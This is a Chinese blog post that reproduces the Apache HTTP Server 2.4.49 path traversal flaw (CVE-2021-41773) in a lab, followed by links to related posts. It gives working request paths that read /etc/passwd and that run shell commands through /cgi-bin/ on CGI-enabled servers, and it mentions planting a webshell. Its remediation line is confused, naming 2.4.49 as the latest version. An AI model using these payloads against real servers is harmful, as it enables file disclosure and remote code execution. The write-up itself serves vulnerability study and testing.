apache-httpd_2.4.49_path-traversal_CVE-2021-41773

原创 已于 2023-09-07 22:26:58 修改 · 343 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #网络安全

于 2023-09-07 22:26:34 首次发布
本文聚焦Apache HTTP Server 2.4.49版本的路径穿越漏洞(CVE - 2021 - 41773)。介绍了漏洞描述、等级为高危,影响版本仅2.4.49。阐述了漏洞复现过程,包括基础环境、扫描与验证,还提及深度利用如命令执行和GetShell,最后有网络测绘挖掘及无修复建议等内容。

apache-httpd_2.4.49_路径穿越漏洞_CVE-2021-41773

说明内容
漏洞编号CVE-2021-41773
漏洞名称Apache HTTP Server 2.4.49 路径穿越漏洞
漏洞评级高危
影响范围2.4.49
漏洞描述引入了一个路径穿越漏洞,穿越的目录允许被访问,可以执行任意命令
修复方案升级

漏洞描述

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:

  • 版本等于2.4.49
  • 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的)

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

漏洞等级

高危

影响版本

  • Apache HTTP Server 2.4.49

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
Apache HTTP Server2.4.49

漏洞扫描

使用nuclei可以扫描到漏洞

./nuclei -u 192.168.117.163

在这里插入图片描述

漏洞验证

  1. 启动环境,访问主页,进行抓包

    在这里插入图片描述

  2. 访问以下目录,可以直接读到etc/passwd文件

    /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

    在这里插入图片描述

  3. 将GET包改为POST包,访问以下目录,并在最后加上命令

    /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

echo;id

    在这里插入图片描述

深度利用

命令执行

可以通过修改命令进行命令执行

GetShell

可以写入一句话木马getshell

漏洞挖掘

网络测绘

Apache HTTP Server 2.4.49

修复建议

Apache最新版本:Apache 2.4.49
CqcVue的博客
09-24 805
Apache 2.4.49Apache软件的最新版本,它提供了一些新功能和改进,并修复了一些问题。通过按照上述步骤,您可以轻松地安装和配置Apache服务器。使用Apache,您可以搭建高性能、可靠和安全的Web服务。您可以从Apache官方网站(http://httpd.apache.org/download.cgi)上下载Apache 2.4.49的源代码包。Apache是一款广泛使用的开源Web服务器软件,由Apache软件基金会开发和维护。请注意,以上提供的步骤是基于源代码安装的方式。
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773
weixin_47311099的博客
12-07 2235
Apache HTTP Server 2.4.49 路径穿越漏洞复现(CVE-2021-41773Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的) 攻击者利用这个漏洞,可以
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773
weixin_53639243的博客
02-27 592
如果这些目录之外的文件不受通常的默认配置“require all denied”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程执行代码。在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。Apache HTTP 服务器项目旨在为现代操作系统(包括 UNIX 和 Windows)开发和维护开源 HTTP 服务器。发送到重发器,进行改包操作。
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3654
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
【漏洞复现】Apahce HTTPd 2.4.49CVE-2021-41773)路径穿越漏洞
中二电工吹短笛的博客
05-09 1134
是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了中的一个路径遍历和文件泄露漏洞。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
weixin_42786460的博客
09-25 1356
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
CVE-2021-41773-Apache HTTP Server 2.4.49路径穿越流量特征
12306小哥
10-10 809
0x1 简介 Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了Require all granted。(默认情况下是不允许的) 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 0x2 漏洞详情 使用如
CVE-2021-41773 && CVE-2021-42013 Apache HTTPd最新RCE漏洞复现 && 目录穿越漏洞
weixin_45694388的博客
10-16 3675
漏洞描述: Apache HTTPdApache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_47311099的博客
12-07 2641
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013) Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.49
Apache 2.4.49 路径穿越漏洞复现 ( CVE-2021-41773 )
qq_45396375的博客
01-04 913
Apache HTTP Server 2.4.49版本中存在一处路径穿越漏洞(CVE-2021-41773)如果配置了Require all granted,远程攻击者可以使用路径遍历攻击访问易受攻击的Web服务器上文档根目录以外的任意文件;如果Apache HTTP Server 2.4.49开启了CGI,攻击者还可构造恶意请求实现远程代码执行。
Apache HTTP Server 2.4.49 路径穿越,远程命令执行漏洞
cainiao17441898的博客
10-20 1940
文章目录项目场景:问题描述:原因分析:解决方案: 项目场景: Apache HTTP Server 2.4.492.5.0 问题描述: 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 原因分析: 远程命令执行 在httpd.conf的文件中的这俩配置,导致任意请求都能访问根目录,和cgi-bin目录。 CGI是一段程序,它运行在Server上,提供同客户端 Html页面的接口。如果它能目
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
weixin_48400575的博客
02-13 4120
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
Apache http Server 2.4 安装与配置
weixin_34413802的博客
11-16 260
前言 Apache官网从2.2之后,不再提供windows的msi或exe安装版本,现在Apache http Server有两个分支2.22.4 注意事项 如果之前有安装2.2的版本,请先卸载 Apache2.4下载 1、进入apache官网:https://httpd.apache.org/download.cgi 2、选择2.4的版本,点击 Files for Micros...
Exploit - Apache Tomcat Directory/Path Traversal
Nixawk
04-06 2462
http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/usersPrevious URL would copy file na
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 1710
CVE-2021-41773 漏洞复现
Apache——CVE-2021-41773
qq_45770644的博客
10-06 4118
前言: Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序,该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用,它表示,并可能允许攻击者访问敏感信息。 CVE-2021-41773可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。 该问题仅影响 Apache 开源 Web 服务器的 2.4.49.
CVE-2021-41773
最新发布
Dikesi的博客
02-08 943
Apache HTTP Server 路径穿越漏洞
网站路径遍历漏洞修复
qq_33163046的博客
07-04 3542
在当今的网络安全环境中,路径遍历漏洞(Path Traversal Vulnerability)成为日益关注的问题。此漏洞允许攻击者通过操控输入路径,访问未经授权的服务器文件,从而泄露敏感信息或执行恶意文件。本文将借助一次渗透测试修复的过程有效防止和修复此类漏洞,提升应用程序的整体安全性。
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
W小哥
10-14 4376
一、漏洞描述 Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 二、影响版本 Apache 2.4.49Apache 2.4.50 三、靶场准备 本实验使用vulhub环境,节约搭建时间 mkdir Docker
PyPI 官网发布 mod_wsgi-httpd-2.4.12.6.tar.gz
资源下载中提到的"mod_wsgi-httpd-2.4.12.6.tar.gz"是一个特定的软件包,而这个包是mod_wsgi模块的源代码压缩包。 mod_wsgi是一个用于Apache HTTP服务器的Python Web应用服务器接口,它允许你将Python应用作为...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值